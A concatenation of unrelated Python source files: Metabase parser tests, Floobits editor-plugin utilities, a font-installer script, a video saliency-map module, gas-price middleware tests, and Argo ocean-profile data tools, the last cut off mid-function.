'messages': [self.protobuf_to_message(pb_message) for pb_message in answer.diary.messages]}
|
import os
from pathlib import Path
from unittest import TestCase
from metabase_manager.exceptions import InvalidConfigError
from metabase_manager.parser import Group, MetabaseParser, User
class MetabaseParserTests(TestCase):
def test_from_paths(self):
"""
Ensure MetabaseParser.from_paths() returns an instance of MetabaseParser
with registered config.
"""
path_users = os.path.join(
os.path.dirname(__file__), "fixtures/parser/users.yaml"
)
path_groups = os.path.join(
os.path.dirname(__file__), "fixtures/parser/subdirectory/groups.yml"
)
parser = MetabaseParser.from_paths([path_users, path_groups])
self.assertIsInstance(parser, MetabaseParser)
self.assertSetEqual(
{"Administrators", "Developers", "Read-Only"}, set(parser._groups.keys())
)
self.assertSetEqual(
{"[email protected]", "[email protected]"}, set(parser._users.keys())
)
self.assertTrue(all([isinstance(u, User) for u in parser.users]))
self.assertTrue(all([isinstance(g, Group) for g in parser.groups]))
def test_load_yaml(self):
"""Ensure MetabaseParser.load_yaml() opens and loads a yaml file into a dictionary."""
filepath = os.path.join(os.path.dirname(__file__), "fixtures/parser/users.yaml")
users = MetabaseParser.load_yaml(filepath)
self.assertIsInstance(users, dict)
def test_parse_yaml(self):
"""Ensure MetabaseParser.parse_yaml() registers all objects of all types in the yaml file."""
# has both users and groups
filepath = os.path.join(os.path.dirname(__file__), "fixtures/parser/users.yaml")
objects = MetabaseParser.load_yaml(filepath)
conf = MetabaseParser()
self.assertEqual(0, len(conf.users))
self.assertEqual(0, len(conf.groups))
conf.parse_yaml(objects)
self.assertEqual(2, len(conf.users))
self.assertEqual(1, len(conf.groups))
def test_parse_yaml_raises_error(self):
"""Ensure MetabaseParser.parse_yaml() raises InvalidConfigError when unexpected keys are found."""
parser = MetabaseParser()
with self.assertRaises(InvalidConfigError):
parser.parse_yaml({"unknown": {"something": ""}})
def test_register_objects(self):
"""Ensure MetabaseParser.register_objects() registers all objects of the same type in a list of dicts."""
objects = [{"name": "Administrators"}, {"name": "Developers"}]
conf = MetabaseParser()
self.assertEqual(0, len(conf._groups.keys()))
conf.register_objects(objects, "groups")
self.assertEqual(2, len(conf._groups.keys()))
self.assertIsInstance(conf._groups["Administrators"], Group)
self.assertIsInstance(conf._groups["Developers"], Group)
def test_register_object(self):
"""Ensure MetabaseParser.register_object() registers an object to the instance with the correct key."""
user = User(first_name="", last_name="", email="foo")
conf = MetabaseParser()
conf.register_object(user, "users")
self.assertEqual(conf._users["foo"], user)
def test_register_object_raises_on_duplicate_key(self):
"""Ensure MetabaseParser.register_object() raises an error if the object_key already exists."""
user = User(first_name="", last_name="", email="[email protected]")
conf = MetabaseParser()
conf.register_object(user, "users")
with self.assertRaises(KeyError):
conf.register_object(user, "users")
|
import os
import errno
import json
import re
import hashlib
import time
import webbrowser
from functools import wraps
from urllib.parse import urlparse
from .. import editor
from . import shared as G
from .exc_fmt import str_e
from . import msg
from .lib import DMP
class JOIN_ACTION(object):
PROMPT = 1
UPLOAD = 2
DOWNLOAD = 3
class FlooPatch(object):
def __init__(self, current, buf):
self.buf = buf
self.current = current
self.previous = buf['buf']
if buf['encoding'] == 'base64':
self.md5_before = hashlib.md5(self.previous).hexdigest()
self.md5_after = hashlib.md5(self.current).hexdigest()
else:
try:
self.md5_before = hashlib.md5(self.previous.encode('utf-8')).hexdigest()
except Exception as e:
# Horrible fallback if for some reason encoding doesn't agree with actual object
self.md5_before = hashlib.md5(self.previous).hexdigest()
msg.log('Error calculating md5_before for ', str(self), ': ', str_e(e))
try:
self.md5_after = hashlib.md5(self.current.encode('utf-8')).hexdigest()
except Exception as e:
# Horrible fallback if for some reason encoding doesn't agree with actual object
self.md5_after = hashlib.md5(self.current).hexdigest()
msg.log('Error calculating md5_after for ', str(self), ': ', str_e(e))
def __str__(self):
return '%s - %s' % (self.buf['id'], self.buf['path'])
def patches(self):
return DMP.patch_make(self.previous, self.current)
def to_json(self):
patches = self.patches()
if len(patches) == 0:
return None
patch_str = ''
for patch in patches:
patch_str += str(patch)
return {
'id': self.buf['id'],
'md5_after': self.md5_after,
'md5_before': self.md5_before,
'path': self.buf['path'],
'patch': patch_str,
'name': 'patch'
}
def reload_settings():
floorc_settings = load_floorc_json()
for name, val in list(floorc_settings.items()):
setattr(G, name, val)
validate_auth(G.AUTH)
if G.SHARE_DIR:
G.BASE_DIR = G.SHARE_DIR
G.BASE_DIR = os.path.realpath(os.path.expanduser(G.BASE_DIR))
G.COLAB_DIR = os.path.join(G.BASE_DIR, 'share')
G.COLAB_DIR = os.path.realpath(G.COLAB_DIR)
if G.DEBUG:
msg.LOG_LEVEL = msg.LOG_LEVELS['DEBUG']
else:
msg.LOG_LEVEL = msg.LOG_LEVELS['MSG']
mkdir(G.COLAB_DIR)
return floorc_settings
def load_floorc_json():
# Expose a few settings for curious users to tweak
s = {
'expert_mode': False,
'debug': False,
}
try:
with open(G.FLOORC_JSON_PATH, 'r') as fd:
floorc_json = fd.read()
except IOError as e:
if e.errno == errno.ENOENT:
return s
raise
try:
default_settings = json.loads(floorc_json)
except ValueError:
return s
for k, v in list(default_settings.items()):
s[k.upper()] = v
return s
def save_floorc_json(s):
floorc_json = {}
for k, v in list(s.items()):
floorc_json[k.lower()] = v
msg.log('Writing ', floorc_json)
with open(G.FLOORC_JSON_PATH, 'w') as fd:
fd.write(json.dumps(floorc_json, indent=4, sort_keys=True, separators=(',', ': ')))
def validate_auth(auth):
if type(auth) != dict:
msg.error('floorc.json validation error: Auth section is not an object!')
return False
to_delete = []
for k, v in list(auth.items()):
if type(v) != dict:
msg.error('floorc.json validation error: host "', k, '" has invalid auth credentials. Did you put a setting in the auth section?')
to_delete.append(k)
break
for key in ['username', 'api_key', 'secret']:
if not v.get(key):
msg.error('floorc.json validation error: host "', k, '" missing "', key, '"')
to_delete.append(k)
break
for k in to_delete:
del auth[k]
return len(to_delete) == 0
def can_auth(host=None):
if host is None:
host = len(G.AUTH) and list(G.AUTH.keys())[0] or G.DEFAULT_HOST
auth = G.AUTH.get(host)
if type(auth) == dict:
return bool((auth.get('username') or auth.get('api_key')) and auth.get('secret'))
return False
cancelled_timeouts = set()
timeout_ids = set()
def set_timeout(func, timeout, *args, **kwargs):
return _set_timeout(func, timeout, False, *args, **kwargs)
def set_interval(func, timeout, *args, **kwargs):
return _set_timeout(func, timeout, True, *args, **kwargs)
def _set_timeout(func, timeout, repeat, *args, **kwargs):
timeout_id = set_timeout._top_timeout_id
if timeout_id > 100000:
set_timeout._top_timeout_id = 0
else:
set_timeout._top_timeout_id += 1
    from . import api
@api.send_errors
def timeout_func():
timeout_ids.discard(timeout_id)
if timeout_id in cancelled_timeouts:
cancelled_timeouts.remove(timeout_id)
return
func(*args, **kwargs)
if repeat:
editor.set_timeout(timeout_func, timeout)
timeout_ids.add(timeout_id)
editor.set_timeout(timeout_func, timeout)
timeout_ids.add(timeout_id)
return timeout_id
set_timeout._top_timeout_id = 0
def cancel_timeout(timeout_id):
if timeout_id in timeout_ids:
cancelled_timeouts.add(timeout_id)
rate_limits = {}
def rate_limit(name, timeout, func, *args, **kwargs):
if rate_limits.get(name):
return
rate_limits[name] = time.time()
func(*args, **kwargs)
def delete_limit():
del rate_limits[name]
    set_timeout(delete_limit, timeout)
def parse_url(workspace_url):
secure = G.SECURE
owner = None
workspace_name = None
# owner/workspacename
    result = re.match(r'^([-\@\+\.\w]+)/([-\.\w]+)$', workspace_url)
if result:
workspace_url = 'https://' + G.DEFAULT_HOST + '/' + workspace_url
parsed_url = urlparse(workspace_url)
port = parsed_url.port
if G.DEBUG and parsed_url.scheme == 'http':
# Only obey http if we're debugging
if not port:
port = 3148
secure = False
if not port:
port = G.DEFAULT_PORT
# Allow /file/...
    result = re.match(r'^/([-\@\+\.\w]+)/([-\.\w]+)/?.*$', parsed_url.path)
if not result:
# Old style URL. Do not remove. People still have these in their persistent.json
        result = re.match(r'^/r/([-\@\+\.\w]+)/([-\.\w]+)/?$', parsed_url.path)
if result:
(owner, workspace_name) = result.groups()
else:
raise ValueError('%s is not a valid Floobits URL' % workspace_url)
return {
'host': parsed_url.hostname,
'owner': owner,
'port': port,
'workspace': workspace_name,
'secure': secure,
}
def to_workspace_url(r):
port = int(r.get('port', 3448))
if r['secure']:
proto = 'https'
if port == 3448:
port = ''
else:
proto = 'http'
if port == 3148:
port = ''
if port != '':
port = ':%s' % port
host = r.get('host', G.DEFAULT_HOST)
workspace_url = '%s://%s%s/%s/%s' % (proto, host, port, r['owner'], r['workspace'])
p = r.get('path')
if p:
workspace_url += '/file/%s' % p
line = r.get('line')
if line:
workspace_url += ':%s' % line
return workspace_url
def normalize_url(workspace_url):
return to_workspace_url(parse_url(workspace_url))
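# Example round trip (assuming G.DEFAULT_HOST is 'floobits.com', G.SECURE is
# True and G.DEFAULT_PORT is 3448):
#   normalize_url('owner/workspace') -> 'https://floobits.com/owner/workspace'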
def get_full_path(p):
full_path = os.path.join(G.PROJECT_PATH, p)
return unfuck_path(full_path)
def unfuck_path(p):
return os.path.normpath(p)
def to_rel_path(p):
return os.path.relpath(p, G.PROJECT_PATH).replace(os.sep, '/')
def to_scheme(secure):
if secure is True:
return 'https'
return 'http'
def is_shared(p):
if not G.AGENT or not G.AGENT.joined_workspace:
return False
p = unfuck_path(p)
try:
if to_rel_path(p).find('../') == 0:
return False
except ValueError:
return False
return True
def update_floo_file(path, data):
try:
floo_json = json.loads(open(path, 'r').read())
except Exception:
pass
try:
floo_json.update(data)
except Exception:
floo_json = data
try:
with open(path, 'w') as floo_fd:
floo_fd.write(json.dumps(floo_json, indent=4, sort_keys=True, separators=(',', ': ')))
except Exception as e:
msg.warn('Couldn\'t update .floo file: ', floo_json, ': ', str_e(e))
def read_floo_file(path):
floo_file = os.path.join(path, '.floo')
info = {}
try:
floo_info = open(floo_file, 'rb').read().decode('utf-8')
info = json.loads(floo_info)
except (IOError, OSError):
pass
except Exception as e:
msg.warn('Couldn\'t read .floo file: ', floo_file, ': ', str_e(e))
return info
def get_persistent_data(per_path=None):
per_data = {'recent_workspaces': [], 'workspaces': {}}
per_path = per_path or os.path.join(G.BASE_DIR, 'persistent.json')
try:
per = open(per_path, 'rb')
except (IOError, OSError):
msg.debug('Failed to open ', per_path, '. Recent workspace list will be empty.')
return per_data
try:
data = per.read().decode('utf-8')
persistent_data = json.loads(data)
except Exception as e:
msg.debug('Failed to parse ', per_path, '. Recent workspace list will be empty.')
msg.debug(str_e(e))
msg.debug(data)
return per_data
if 'recent_workspaces' not in persistent_data:
persistent_data['recent_workspaces'] = []
if 'workspaces' not in persistent_data:
persistent_data['workspaces'] = {}
return persistent_data
def update_persistent_data(data):
seen = set()
recent_workspaces = []
for x in data['recent_workspaces']:
try:
if x['url'] in seen:
continue
seen.add(x['url'])
recent_workspaces.append(x)
except Exception as e:
msg.debug(str_e(e))
data['recent_workspaces'] = recent_workspaces
per_path = os.path.join(G.BASE_DIR, 'persistent.json')
with open(per_path, 'wb') as per:
per.write(json.dumps(data, indent=2).encode('utf-8'))
# Cleans up URLs in persistent.json
def normalize_persistent_data():
persistent_data = get_persistent_data()
for rw in persistent_data['recent_workspaces']:
rw['url'] = normalize_url(rw['url'])
for owner, workspaces in list(persistent_data['workspaces'].items()):
for name, workspace in list(workspaces.items()):
workspace['url'] = normalize_url(workspace['url'])
workspace['path'] = unfuck_path(workspace['path'])
update_persistent_data(persistent_data)
def add_workspace_to_persistent_json(owner, name, url, path):
d = get_persistent_data()
workspaces = d['workspaces']
if owner not in workspaces:
workspaces[owner] = {}
workspaces[owner][name] = {'url': url, 'path': path}
update_persistent_data(d)
def update_recent_workspaces(workspace_url):
d = get_persistent_data()
recent_workspaces = d.get('recent_workspaces', [])
recent_workspaces.insert(0, {'url': workspace_url})
recent_workspaces = recent_workspaces[:100]
seen = set()
new = []
for r in recent_workspaces:
string = json.dumps(r)
if string not in seen:
new.append(r)
seen.add(string)
d['recent_workspaces'] = new
update_persistent_data(d)
def get_workspace_by_path(path, _filter):
path = unfuck_path(path)
for owner, workspaces in list(get_persistent_data()['workspaces'].items()):
for name, workspace in list(workspaces.items()):
if unfuck_path(workspace['path']) == path:
r = _filter(workspace['url'])
if r:
return r
def rm(path):
"""removes path and dirs going up until a OSError"""
os.remove(path)
try:
os.removedirs(os.path.split(path)[0])
except OSError:
pass
def mkdir(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
editor.error_message('Cannot create directory {0}.\n{1}'.format(path, str_e(e)))
raise
def get_line_endings(path):
try:
with open(path, 'rb') as fd:
line = fd.readline()
except Exception:
return
if not line:
return
chunk = line[-2:]
if chunk == "\r\n":
return "\r\n"
if chunk[-1:] == "\n":
return "\n"
def save_buf(buf):
path = get_full_path(buf['path'])
mkdir(os.path.split(path)[0])
if buf['encoding'] == 'utf8':
newline = get_line_endings(path) or editor.get_line_endings(path)
try:
with open(path, 'wb') as fd:
if buf['encoding'] == 'utf8':
out = buf['buf']
if newline != '\n':
out = out.split('\n')
out = newline.join(out)
fd.write(out.encode('utf-8'))
else:
fd.write(buf['buf'])
except Exception as e:
msg.error('Error saving buf: ', str_e(e))
def _unwind_generator(gen_expr, cb=None, res=None):
try:
while True:
maybe_func = res
args = []
# if the first arg is callable, we need to call it (and assume the last argument is a callback)
if type(res) == tuple:
maybe_func = len(res) and res[0]
if not callable(maybe_func):
                # send only accepts one argument... this is slightly dangerous if
                # we ever just return a tuple of one element
# TODO: catch no generator
if type(res) == tuple and len(res) == 1:
res = gen_expr.send(res[0])
else:
res = gen_expr.send(res)
continue
def f(*args):
return _unwind_generator(gen_expr, cb, args)
try:
args = list(res)[1:]
except Exception:
# assume not iterable
args = []
args.append(f)
return maybe_func(*args)
# TODO: probably shouldn't catch StopIteration to return since that can occur by accident...
except StopIteration:
pass
except __StopUnwindingException as e:
res = e.ret_val
if cb:
return cb(res)
return res
class __StopUnwindingException(BaseException):
def __init__(self, ret_val):
self.ret_val = ret_val
def return_value(args):
raise __StopUnwindingException(args)
def inlined_callbacks(f):
""" Branching logic in async functions generates a callback nightmare.
Use this decorator to inline the results. If you yield a function, it must
accept a callback as its final argument that it is responsible for firing.
example usage:
"""
@wraps(f)
def wrap(*args, **kwargs):
return _unwind_generator(f(*args, **kwargs))
return wrap
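# A minimal usage sketch (hypothetical names): the decorated function is a
# generator that yields tuples of (callback_style_function, *args); the yielded
# function is called with those args plus a callback appended, and whatever it
# passes to that callback becomes the value of the yield expression.
#
#   @inlined_callbacks
#   def join(prompt):
#       # `prompt` stands in for any function taking (message, callback) that
#       # later calls callback(answer)
#       answer = yield prompt, 'Workspace URL?'
#       return_value(answer)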
def has_browser():
valid_browsers = [
"MacOSX", # Default mac browser.
"Chrome",
"Chromium",
"Firefox",
"Safari",
"Opera",
"windows-default",
]
for browser in valid_browsers:
try:
webbrowser.get(browser)
return True
except Exception:
continue
return False
|
import os
from monaco_racing import RaceReport
from monaco_racing_flask.model.driver import Driver
from monaco_racing_flask.app import db_wrapper
PROJECT_DIR = os.path.dirname(__file__)
leaderboard = RaceReport(os.path.join(PROJECT_DIR, 'data'))
def create_test_db():
db_wrapper.database.create_tables([Driver])
for abbr, driver in leaderboard.items():
Driver.create(abbr=abbr,
name=driver.name,
car=driver.car,
start=driver.start,
end=driver.end)
db_wrapper.database.close()
|
""" -----------------------------------------------------------------------------
MIT License
Copyright (c) 2020 Abhilash PS
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
----------------------------------------------------------------------------
:copyright: Abhilash PS
:month-year: 02-2020
----------------------------------------------------------------------------
"""
"""
script to unzip all the zip files and install any otf/ttf fonts in that.
It should cleanup the directory after the installation
"""
import zipfile, os, pathlib, shutil
if __name__ == "__main__":
print()
    # receive the download directory path; create it if it does not exist
download_dir_path = input("Enter the download directory: ")
download_directory = pathlib.Path(download_dir_path)
if not download_directory.exists():
os.mkdir(download_dir_path)
print()
    # create the font directory if it does not exist
font_dir_path = os.path.expanduser("~/.fonts")
font_directory = pathlib.Path(font_dir_path)
if not font_directory.exists():
os.mkdir(font_dir_path)
print()
    # extract every zip archive found in the download directory
    for root, dirs, files in os.walk(download_dir_path, topdown=True):
for file in files:
if file[-4:] == '.zip':
zip_file = os.path.join(root, file)
with zipfile.ZipFile(zip_file, 'r') as zip_ref:
zip_ref.extractall(download_dir_path)
print()
font_files = {}
directory_paths = []
    for root, dirs, files in os.walk(download_dir_path, topdown=True):
        # collect all otf/ttf files found anywhere under the download directory
        font_files.update({font_file: root for font_file in files if font_file[-4:] in ['.otf', '.ttf']})
# copy the font files to ~/.fonts
for key in font_files.keys():
targe_path = os.path.join(font_directory, key)
source_path = os.path.join(font_files[key], key)
directory_paths.append(font_files[key])
try:
shutil.copy(source_path, targe_path)
except PermissionError as pe:
print('PermissionError - {} - {}'.format(pe, targe_path))
except FileNotFoundError as fne:
print('FileNotFoundError - {} - {}'.format(fne, targe_path))
else:
os.remove(source_path)
print('source_path --- ', source_path)
print()
    paths = list(set(directory_paths))
    if download_dir_path in paths:
        paths.remove(download_dir_path)
for path in paths:
try:
shutil.rmtree(path)
except Exception as e:
print(e)
print()
    # refresh the font cache
os.system('sudo fc-cache -f -v')
|
from pathlib import Path
import json
import random
import os
import numpy as np
import torch
import torch.multiprocessing as mp
import torch.distributed as dist
from torch.backends import cudnn
import torchvision
import csv
import matplotlib.pyplot as plt
import cv2
ACTION_NAMES = ["sneezeCough", "staggering", "fallingDown",
"headache", "chestPain", "backPain",
"neckPain", "nauseaVomiting", "fanSelf"]
def get_saliency_map(opt, model, X, y):
"""
This is a function added for 231n.
Compute a class saliency map using the model for single video X and label y.
Input:
- X: Input video; Tensor of shape (1, 3, T, H, W) -- 1 video, 3 channels, T frames, HxW images
- y: Labels for X; LongTensor of shape (1,) -- 1 label
- model: A pretrained CNN that will be used to compute the saliency map.
Returns:
- saliency: A Tensor of shape (1, T, H, W) giving the saliency maps for the input
images.
"""
# Make sure the model is in "test" mode
model.eval()
# Make input tensors require gradient
X.requires_grad_()
saliency = None
# Convert y (targets) into labels
labels = []
for elem in y:
left, _ = elem.split("_")
label = int(left[-2:]) - 41
labels.append(label)
y = torch.LongTensor(labels)
if not opt.no_cuda:
y = y.cuda()
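    # gather() picks, for each video, the score of its true class; summing them
    # lets a single backward pass fill X.grad with per-pixel gradients.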
scores = model(X).gather(1, y.view(-1, 1)).squeeze().sum()
scores.backward()
saliency, temp = X.grad.data.abs().max(dim = 1)
return saliency
def plot_saliency(sal_map, i, inputs, targets):
# Use matplotlib to make one figure showing the average image for each segment
# for the video and the saliency map for each segment of the video
# For a video with 5 segments which results in sal_map 5x16x112x112
# We avg over the 16 saliency maps (one for each image in the segment) to get 5x112x112
# inputs has shape 5x3x16x112x112 --> this is the segment of input images
    # Avg over 16 images in the segment and then average over the 3 channels of each image
# Plot each of the 5 images with corresponding heatmap of saliency
with torch.no_grad():
sal_map = sal_map.numpy()
inputs = inputs.detach().numpy()
        # 1. Average the saliency maps over the frame dimension (skipping the first 3 frames)
        avg_sal_map = np.mean(sal_map[:,3:,:,:], axis=1)
        # 2. Average the inputs over the frame dimension, then over the 3 channels
        avg_inputs = np.mean(inputs[:,:,3:,:,:], axis=2)
        max_inputs = np.mean(avg_inputs, axis=1)
# 3. Convert targets into labels
labels = []
for elem in targets:
label = int(elem.split('_')[0][-2:]) - 41
labels.append(label)
y = torch.LongTensor(labels)
        # 4. Make a plt figure, put the images in their correct positions, and save to file
N = sal_map.shape[0]
for j in range(N):
fig = plt.figure(figsize=(9,9))
ax = fig.add_subplot(2, N, j + 1)
ax.imshow(max_inputs[j])
#plt.imshow(max_inputs[j])
ax.axis('off')
fig.suptitle(ACTION_NAMES[y[j]])
ax2 = fig.add_subplot(2, N, N + j + 1)
ax2.imshow(avg_sal_map[j], cmap=plt.cm.hot)
#plt.imshow(avg_sal_map[j], cmap=plt.cm.hot)
ax2.axis('off')
#plt.gcf().set_size_inches(12, )
plt.show()
figpath = Path('/home/shared/workspace/human-activity-recognition/Efficient-3DCNNs/data/results/saliency_maps/average'+ACTION_NAMES[y[j]]+str(i))
fig.savefig(figpath)
center_frame = int(avg_inputs.shape[1]/2)
#for j in range(N):
# plt.subplot(2, N, j + 1)
# plt.imshow(avg_inputs[j,center_frame,:,:])
# plt.axis('off')
# plt.title(ACTION_NAMES[y[j]])
# plt.subplot(2, N, N + j + 1)
# plt.imshow(sal_map[j,center_frame,:,:], cmap=plt.cm.hot)
# plt.axis('off')
#plt.gcf().set_size_inches(12, )
# plt.show()
#figpath = Path('/home/shared/workspace/human-activity-recognition/Efficient-3DCNNs/data/results/saliency_maps/center'+ACTION_NAMES[y[j]]+str(i))
#plt.savefig(figpath)
return None
|
import pytest
from unittest.mock import (
Mock,
)
from webu.middleware import (
gas_price_strategy_middleware,
)
@pytest.fixture
def the_gas_price_strategy_middleware(webu):
make_request, webu = Mock(), Mock()
initialized = gas_price_strategy_middleware(make_request, webu)
initialized.webu = webu
initialized.make_request = make_request
return initialized
def test_gas_price_generated(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.webu.eth.generateGasPrice.return_value = 5
method = 'eth_sendTransaction'
params = [{
'to': '0x0',
'value': 1,
}]
the_gas_price_strategy_middleware(method, params)
the_gas_price_strategy_middleware.webu.eth.generateGasPrice.assert_called_once_with({
'to': '0x0',
'value': 1,
})
the_gas_price_strategy_middleware.make_request.assert_called_once_with(method, [{
'to': '0x0',
'value': 1,
'gasPrice': 5,
}])
def test_gas_price_not_overridden(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.webu.eth.generateGasPrice.return_value = 5
method = 'eth_sendTransaction'
params = [{
'to': '0x0',
'value': 1,
'gasPrice': 10,
}]
the_gas_price_strategy_middleware(method, params)
the_gas_price_strategy_middleware.make_request.assert_called_once_with(method, [{
'to': '0x0',
'value': 1,
'gasPrice': 10,
}])
def test_gas_price_not_set_without_gas_price_strategy(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.webu.eth.generateGasPrice.return_value = None
method = 'eth_sendTransaction'
params = [{
'to': '0x0',
'value': 1,
}]
the_gas_price_strategy_middleware(method, params)
the_gas_price_strategy_middleware.make_request.assert_called_once_with(method, params)
def test_not_generate_gas_price_when_not_send_transaction_rpc(the_gas_price_strategy_middleware):
the_gas_price_strategy_middleware.webu.getGasPriceStrategy = Mock()
the_gas_price_strategy_middleware('eth_getBalance', [])
the_gas_price_strategy_middleware.webu.getGasPriceStrategy.assert_not_called()
|
import numpy as np
import glob
import pandas as pd
import os
from netCDF4 import Dataset
import socket
atlas_name = "meanstate" # or "eape"
hostname = socket.gethostname()
if (hostname[:8] == "datarmor") or (hostname[::2][:3] == "rin"):
# login node is datarmor3
# computational nodes are rXiYnZ
gdac = "/home/ref-argo/gdac/dac"
pargopy = "/home1/datawork/groullet/argopy"
elif hostname in ["altair", "libra"]:
gdac = "/net/alpha/exports/sciences/roullet/Argo/dac"
pargopy = "/net/alpha/exports/sciences/roullet/Argo"
else:
raise ValueError("Configure tools.py before using Argopy")
daclist = ["aoml", "bodc", "coriolis", "csio",
"csiro", "incois", "jma", "kma",
"kordi", "meds", "nmdis"]
zref = np.array([0., 10., 20., 30., 40., 50., 60., 70., 80., 90.,
100., 110., 120., 130., 140., 150., 160., 170.,
180., 190., 200., 220., 240., 260., 280, 300.,
320., 340., 360., 380., 400., 450., 500., 550.,
600., 650., 700., 750., 800., 850., 900., 950.,
1000., 1050., 1100., 1150., 1200., 1250., 1300.,
1350., 1400., 1450., 1500., 1550., 1600., 1650.,
1700., 1750., 1800., 1850., 1900., 1950.,
2000.])
argodb_keys = ["DAC", "WMO", "IPROF", "N_LEVELS", "DATA_MODE", "LONGITUDE", "LATITUDE", "JULD", "STATUS"]
global_dir = "%s/global" % pargopy
argodb_dir = "%s/argo" % global_dir
argodb_file = "%s/argo_global.pkl" % argodb_dir
argo_file = gdac+"/%s/%i/%i_prof.nc"
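# e.g. argo_file % ("coriolis", 6901181, 6901181) expands to
# gdac + "/coriolis/6901181/6901181_prof.nc" (hypothetical DAC/WMO values)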
def create_folders():
for d in [global_dir, argodb_dir]:
if os.path.exists(d):
pass
else:
os.makedirs(d)
def unmask(data):
""" transform masked array into regular numpy array """
data_out = {}
for k in data.keys():
if type(data[k]) is np.ma.core.MaskedArray:
data_out[k] = data[k].data
else:
data_out[k] = data[k]
return data_out
def bytes2str(data):
""" byte strings into strings"""
data_out = {}
for k in data.keys():
data_out[k] = data[k]
if type(data[k]) is np.ndarray:
firstelem = data_out[k].ravel()[0]
#print(k, type(firstelem))
if type(firstelem) is np.bytes_:
data_out[k] = np.asarray(data[k].data, dtype=str)
return data_out
def get_all_wmos():
print("retrieve all wmos in the DAC ", end="")
wmos = []
dacs = []
for dac in daclist:
prfiles = glob.glob("{}/{}/*/*_prof.nc".format(gdac, dac))
wmos += [int(f.split("/")[-2]) for f in prfiles]
dacs += [dac for f in prfiles]
nwmos = len(wmos)
print("/ found: %i" % nwmos)
return (dacs, wmos)
def write_argodb(argo):
f = argodb_file
print("write %s " % f)
pd.to_pickle(argo, f)
def read_argodb():
d = argodb_dir
f = argodb_file
if os.path.exists(f):
print("read %s " % f)
argo = pd.read_pickle(f)
else:
if os.path.exists(d):
pass
else:
os.makedirs(d)
print("Creation of the empty argo database: %s" % f)
argo = pd.DataFrame(columns=argodb_keys)
write_argodb(argo)
return argo
def update_argodb(argo, dacs, wmos):
idx0 = argo.index
print("update argo with %i wmos" % len(wmos))
for dac, wmo in zip(dacs, wmos):
print("\r%9s - %8i" % (dac, wmo), end="")
a0 = argo[(argo.DAC == dac) & (argo.WMO == wmo)]
output = read_profile(dac, wmo,
header=True, headerqc=True,
verbose=False, path=gdac)
# print(output.keys())
# print(len(output["JULD"]))
# print(output)
nprof = output["N_PROF"]
nlevels = output["N_LEVELS"]
tags = [hash((dac, wmo, i)) for i in range(nprof)]
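        # tag each profile with hash((dac, wmo, i)) and use the tags as the
        # DataFrame index so new profiles can be found via index.difference();
        # note that str hashing is randomized per interpreter session unless
        # PYTHONHASHSEED is fixed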
a1 = pd.DataFrame(columns=argodb_keys)
for k in ["JULD", "LONGITUDE", "LATITUDE", "DATA_MODE"]:
a1[k] = output[k]
a1.STATUS = "N"
a1.DAC = [dac]*nprof
a1.WMO = [wmo]*nprof
a1.IPROF = np.arange(nprof)
a1.N_LEVELS = [nlevels]*nprof
a1.index = tags
data = {k: output[k] for k in ["POSITION_QC", "JULD_QC"]}
qc = pd.DataFrame(data=data, index=a1.index)
bad_jul = qc[(qc.POSITION_QC == "1") & (qc.JULD_QC != "1")].index
bad_pos = qc[(qc.POSITION_QC != "1")].index
newtags = a1.index.difference(a0.index)
print("===>newtags: %i" % len(newtags))
argo = pd.concat([argo, a1.loc[newtags, :]])
argo.loc[bad_jul, "STATUS"] = "T"
argo.loc[bad_pos, "STATUS"] = "L"
print()
return argo
def read_profile(dac, wmo, iprof=None,
header=False, data=False,
headerqc=False, dataqc=False,
shortheader=False,
verbose=True, path=None):
"""
    :param dac: DAC of the requested profile
    :param wmo: WMO of the requested profile
    :param iprof: index of the requested profile (None means all profiles)
    :param header: select only LATITUDE, LONGITUDE and JULD
    :param headerqc: select only POSITION_QC and JULD_QC
    :param data: select TEMP, PSAL and PRES
    :param dataqc: select TEMP_QC, PSAL_QC and PRES_QC
    :param verbose: if True, print the name of the file being read
    The values selected through the arguments passed to the function define
    the dictionary that the function returns.
    Basic driver to read a *_prof.nc data file.
    The output is a dictionary of vectors
    - read one or all profiles
    - read the header (lat, lon, juld) or not
    - read the data or not
    - always return DAC, WMO, N_PROF, N_LEVELS and DATE_UPDATE
    :rtype: dict
"""
key_header = ["LATITUDE", "LONGITUDE", "JULD"]
key_headerqc = ["POSITION_QC", "JULD_QC"]
key_data = ["TEMP", "PSAL", "PRES"]
key_dataqc = ["TEMP_QC", "PSAL_QC", "PRES_QC"]
filename = argo_file % (dac, wmo, wmo)
if verbose:
print(filename)
# print("/".join(filename.split("/")[-3:]))
output = {}
required_keys = set(["TEMP", "PSAL", "PRES"])
if (os.path.isfile(filename)):
with Dataset(filename, "r", format="NETCDF4") as f:
output["DAC"] = dac
output["WMO"] = wmo
output["N_PROF"] = len(f.dimensions["N_PROF"])
output["N_LEVELS"] = len(f.dimensions["N_LEVELS"])
# DATE_UPDATE is an array of 14 characters in the *_prof.nc
# we transform it into an int
# YYYYMMDDhhmmss
# print(filename)
dateupdate = f.variables["DATE_UPDATE"][:]
if type(dateupdate) is np.ma.core.MaskedArray:
dateupdate = [c.decode("utf-8") for c in dateupdate.data]
output["DATE_UPDATE"] = "".join(dateupdate)
if shortheader:
pass
else:
keyvar = set(f.variables.keys())
if required_keys.issubset(keyvar):
output["TSP_QC"] = "1"
else:
output["TSP_QC"] = "2"
if header or headerqc or data or dataqc:
if iprof is None:
idx = range(output["N_PROF"])
output["IPROF"] = np.arange(output["N_PROF"])
else:
